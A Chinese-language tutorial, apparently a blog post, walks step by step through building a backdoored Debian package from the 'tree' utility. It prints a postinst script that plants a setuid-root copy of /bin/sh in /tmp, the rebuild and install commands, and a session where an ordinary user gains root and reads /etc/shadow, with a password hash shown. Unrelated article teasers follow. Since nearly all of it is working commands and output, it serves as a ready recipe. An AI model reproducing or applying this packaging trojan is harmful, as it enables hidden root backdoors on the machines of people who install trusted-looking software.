以下介绍怎样制作包括后门的deb安装包。以tree为例进行说明。利用apt-get下载安装包。--download-only表示仅仅下载不做其它处理。

root@deb:~#apt-get download --download-only tree

Get:1Downloading tree 1.6.0-1 [43.3 kB]

Fetched43.3 kB in 2s (21.4 kB/s)

root@deb:~#ls -l

total44

-rw-r--r--1 root root 43314 Feb 4 2012 tree_1.6.0-1_amd64.deb

解压deb安装包,并创建文件夹DEBIAN(大写),在DEBIAN文件夹下创建文件control和postinst。

Control。包括deb包说明信息,比如:包名,版本。平台。作者等。

[EN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.en.html

[CN]:http://www.debian.org/doc/manuals/debian-faq/ch-pkg_basics.zh-cn.html

Postinst。完毕Debian包文件解包文件的配置工作。通常,“postinst”脚本等待用户输入,或提醒用户。假设他接受当前默认值。要记得软件包安装完后返回又一次配置。很多“postinst”脚本负责运行有关命令为新安装或升级的软件重新启动服务。

root@deb:~#dpkg -x tree_1.6.0-1_amd64.deb tree_1.6.0-1_amd64

root@deb:~#mkdir ./tree_1.6.0-1_amd64/DEBIAN

root@deb:~#cd ./tree_1.6.0-1_amd64/DEBIAN/

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#touch control postinst

Control内容,可来源于dpkg–info
/path/to/debfile

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg --info /root/tree_1.6.0-1_amd64.deb

newdebian package, version 2.0.

size43314 bytes: control archive=664 bytes.

393bytes, 12 lines control

433bytes, 7 lines md5sums

Package:tree

Version:1.6.0-1

Architecture:amd64

Maintainer:Florian Ernst <florian@debian.org>

Installed-Size:109

Depends:libc6 (>= 2.3)

Section:utils

Priority:optional

Homepage:http://mama.indstate.edu/users/ice/tree/

Description:displays directory tree, in color

Displaysan indented directory tree, using the same color assignments as

ls,via the LS_COLORS environment variable.

终于control文件内容例如以下:

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat control

Package:tree

Version:1.6.0-1

Architecture:amd64

Maintainer:Florian Ernst <florian@debian.org>

Installed-Size:109

Depends:libc6 (>= 2.3)

Section:utils

Priority:optional

Homepage:http://mama.indstate.edu/users/ice/tree/

Description:displays directory tree, in color Displays an indented directorytree, using the same color assignments as ls, via the LS_COLORSenvironment
variable.

终于postinst脚本内容例如以下:

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat postinst

#!/bin/bash

sudo cp /bin/sh /tmp/rootshell && sudo chown root:root/tmp/rootshell && sudo chmod 4755 /tmp/rootshell

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#chmod 755 postinst

全部配置文件准备完毕后。使用dpkg-deb打包,成功创建包括后门的安装包tree_1.6.0-1_amd64.deb.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/

total4

drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg-deb --build /root/tree_1.6.0-1_amd64/

dpkg-deb:building package `tree' in `/root/tree_1.6.0-1_amd64.deb'.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/

total48

drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64

-rw-r--r--1 root root 43156 Aug 26 06:28 tree_1.6.0-1_amd64.deb

安装后门deb包,创建/tmp/rootshell文件.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/

total20

drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq

drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n

drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR

drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v

drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg -i /root/tree_1.6.0-1_amd64.deb

Selectingpreviously unselected package tree.

(Readingdatabase ... 130311 files and directories currently installed.)

Unpackingtree (from /root/tree_1.6.0-1_amd64.deb) ...

Settingup tree (1.6.0-1) ...

Processingtriggers for man-db ...

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/

total128

drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq

drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n

drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR

-rwsr-xr-x1 root root 106920 Aug 26 06:29 rootshell

drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v

drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker

执行后门

docker@deb:/root/tree_1.6.0-1_amd64/DEBIAN$/tmp/rootshell

#id

uid=1000(docker)gid=1000(docker) euid=0(root)groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),105(scanner),110(bluetooth),112(netdev),1000(docker)

#head -1 /etc/shadow

root:$6$GiCLTee$AEFGgQdvK2LG3m7gtD6.HG39rIrkhh48P..234Xs3DFuxUJ/B7jfJO5mJryPCRmeW1sGHvgf6GT77ztJ.PHO31:16302:0:99999:7:::

#



參考链接:

http://pastebin.com/m5XULth7#

http://www.offensive-security.com/metasploit-unleashed/Binary_Linux_Trojan

create a backdoor deb package的更多相关文章

  1. AX7: CREATE AN AUTOMATED TEST PACKAGE\MODEL

    AX7: CREATE AN AUTOMATED TEST PACKAGE\MODEL It’s really important for a stable solution the use of a ...

  2. ROS学习手记 - 2.1: Create and Build ROS Package 生成包(Python)

    ROS学习手记 - 2.1: Create and Build ROS Package 生成包(Python) 时隔1年,再回来总结这个问题,因为它是ros+python开发中,太常用的一个操作,需要 ...

  3. Quickstart: Create and publish a package using Visual Studio (.NET Framework, Windows)

    https://docs.microsoft.com/en-us/nuget/quickstart/create-and-publish-a-package-using-visual-studio-n ...

  4. create a nodejs npm package

    1. create a folder named m1 2. run command: npm init, this will create the package.json file 3. crea ...

  5. make deb for debian/ubuntu, package software for debian/ubuntu

    here you may find useful information: =====================X8---------------------------------8X==== ...

  6. deb包的安装及dpkg命令小结

    DPKG commands There are two actions, they are dpkg-query and dpkg-deb. Install a package # sudo dpkg ...

  7. Ubuntu Linux: How Do I install .deb Packages?

    Ubuntu Linux: How Do I install .deb Packages? Ubuntu Linux: How Do I install .deb Packages? by Nix C ...

  8. 【Ubuntu 16】DEB软件包管理

    一.背景介绍 开源软件最早的时候没有软件包和软件包管理器,用户只能下载源码包自行配置 编译 安装. 后来linux各发行版本推出了软件包格式和软件包管理程序 Red Hat.Centos使用RPM格式 ...

  9. ubuntu deb pacakge 开发

    安装构建工具 apt-get install pbuilder 推荐安装 sudo apt-get install build-essential autoconf automake \ autoto ...

随机推荐

  1. 利用json实现数据传输

    JSON:JavaScript 对象表示法(JavaScript Object Notation). JSON 是存储和交换文本信息的语法.类似 XML. JSON 比 XML 更小.更快,更易解析. ...

  2. NSUserDefaults 简介

    NSUserDefaults适合存储轻量级的本地数据,一些简单的数据(NSString类型的)例如密码,网址等,NSUserDefaults肯定是首选,但是如果我们自定义了一个对象,对象保存的是一些信 ...

  3. Welcome-to-Swift-19类型嵌套(Nested Types)

    枚举类型常被用于实现特定类或结构体的功能.也能够在有多种变量类型的环境中,方便地定义通用类或结构体来使用,为了实现这种功能,Swift允许你定义类型嵌套,可以在枚举类型.类和结构体中定义支持嵌套的类型 ...

  4. BZOJ4916 神犇和蒟蒻 【欧拉函数 + 杜教筛】

    题目 很久很久以前,有一只神犇叫yzy; 很久很久之后,有一只蒟蒻叫lty; 输入格式 请你读入一个整数N;1<=N<=1E9,A.B模1E9+7; 输出格式 请你输出一个整数A=\sum ...

  5. BZOJ4176 Lucas的数论 【莫比乌斯反演 + 杜教筛】

    题目 去年的Lucas非常喜欢数论题,但是一年以后的Lucas却不那么喜欢了. 在整理以前的试题时,发现了这样一道题目"求Sigma(f(i)),其中1<=i<=N", ...

  6. 刷题总结——regular words(hdu1502 dp+高精度加法+压位)

    题目: Problem Description Consider words of length 3n over alphabet {A, B, C} . Denote the number of o ...

  7. 【CCF】无线网络 搜索

    [思路] 多个起点同时四周扩展广搜,注意会爆int [AC] #include<iostream> #include<cstdio> #include<cstring&g ...

  8. 解决vue项目route使用history模式,tomcat部署刷新url 404问题

    在webapps/项目名 创建WEB-INF ,创建web.xml文件 文件内容如下: <?xml version="1.0" encoding="UTF-8&qu ...

  9. 【BZOJ2693】jzptab (莫比乌斯反演)

    Description 给你$n$,$m$,求 $\sum^n_{i=1} \sum^m_{j=1} \ lcm(x,y)$ 答案对$100000009$取模. 多组数据. Input 第一行有一个正 ...

  10. POJ 3107 Godfather (树重心)

    题目链接:http://poj.org/problem?id=3107 题意: 数重心,并按从小到大输出. 思路: dfs #include <iostream> #include < ...